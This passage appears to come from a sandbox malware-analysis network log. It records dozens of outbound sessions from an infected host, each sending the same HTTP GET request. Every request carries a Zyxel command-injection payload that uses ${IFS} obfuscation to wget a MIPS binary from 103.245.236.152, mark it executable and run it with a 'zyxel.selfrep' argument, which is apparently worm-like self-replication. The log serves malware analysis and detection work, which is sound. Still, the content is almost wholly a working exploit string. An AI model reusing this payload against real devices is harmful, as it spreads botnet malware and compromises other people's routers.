                                          Jan 14, 2024 15:46:18.040137053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4831192.168.2.2359042211.37.150.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040162086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4832192.168.2.233536061.107.240.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040225983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4833192.168.2.2359104210.48.146.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040261030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4834192.168.2.2338182166.215.66.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040302038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4835192.168.2.2347848180.13.207.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040314913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4836192.168.2.2349324143.119.230.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040353060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4837192.168.2.2347732207.229.175.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040379047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4838192.168.2.2351598138.85.173.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040436983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4839192.168.2.234273234.60.76.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040467024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4840192.168.2.235466680.17.147.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040503025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4841192.168.2.2343320176.19.181.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040560961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4842192.168.2.2348914198.182.135.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040571928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4843192.168.2.2352140154.127.175.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040621042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4844192.168.2.2347396199.49.177.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040647984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4845192.168.2.235177220.137.106.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040738106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4846192.168.2.234724889.187.89.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040772915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4847192.168.2.2357008162.194.143.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040803909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4848192.168.2.2348204158.57.187.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040843010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4849192.168.2.235937498.124.32.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040894032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4850192.168.2.234077265.240.182.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040910006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4851192.168.2.234049491.170.235.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040956974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4852192.168.2.2354254218.80.117.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.040988922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4853192.168.2.2359370193.101.52.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041018963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4854192.168.2.235157682.3.250.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041053057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4855192.168.2.2355724118.79.210.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041150093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4856192.168.2.2346192155.115.208.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041177034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4857192.168.2.235151252.182.233.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041217089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4858192.168.2.2344116186.104.166.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041265965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4859192.168.2.235573091.155.129.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.041297913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4860192.168.2.234325623.189.153.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045691013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4861192.168.2.23489869.225.95.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045715094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4862192.168.2.2352170113.88.118.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045742035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4863192.168.2.235422499.8.170.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045811892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4864192.168.2.23385045.157.194.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045841932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4865192.168.2.2345004155.195.245.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045881033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4866192.168.2.233481491.34.53.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045928955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4867192.168.2.2339588156.237.199.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045969963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4868192.168.2.2342264142.227.3.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.045989990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4869192.168.2.235693642.193.217.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052062988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4870192.168.2.2339826162.231.43.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052102089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4871192.168.2.235330636.140.254.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052134037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4872192.168.2.2341458188.97.42.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052184105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4873192.168.2.2338964138.101.97.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052223921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4874192.168.2.2343594173.196.129.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052223921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4875192.168.2.236078236.125.94.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052285910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4876192.168.2.2333648130.160.140.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052330971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4877192.168.2.234019668.201.22.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052370071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4878192.168.2.233517020.218.53.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052397966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4879192.168.2.2356984172.191.228.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052452087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4880192.168.2.2343834198.189.249.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052479029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4881192.168.2.235931012.126.204.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052499056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4882192.168.2.234414814.13.140.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052558899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4883192.168.2.2334612116.216.41.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052598953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4884192.168.2.235462217.8.139.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052634001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4885192.168.2.2349188115.121.218.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052663088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4886192.168.2.2355138147.77.102.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052669048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4887192.168.2.234204667.220.93.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052709103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4888192.168.2.234152272.237.4.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052746058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4889192.168.2.2348796191.99.180.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052797079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4890192.168.2.2337238142.75.246.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052815914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4891192.168.2.2334446100.196.2.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052880049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4892192.168.2.235846872.185.146.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.052911997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4893192.168.2.23604161.78.245.252443
                                          TimestampBytes transferredDirectionData
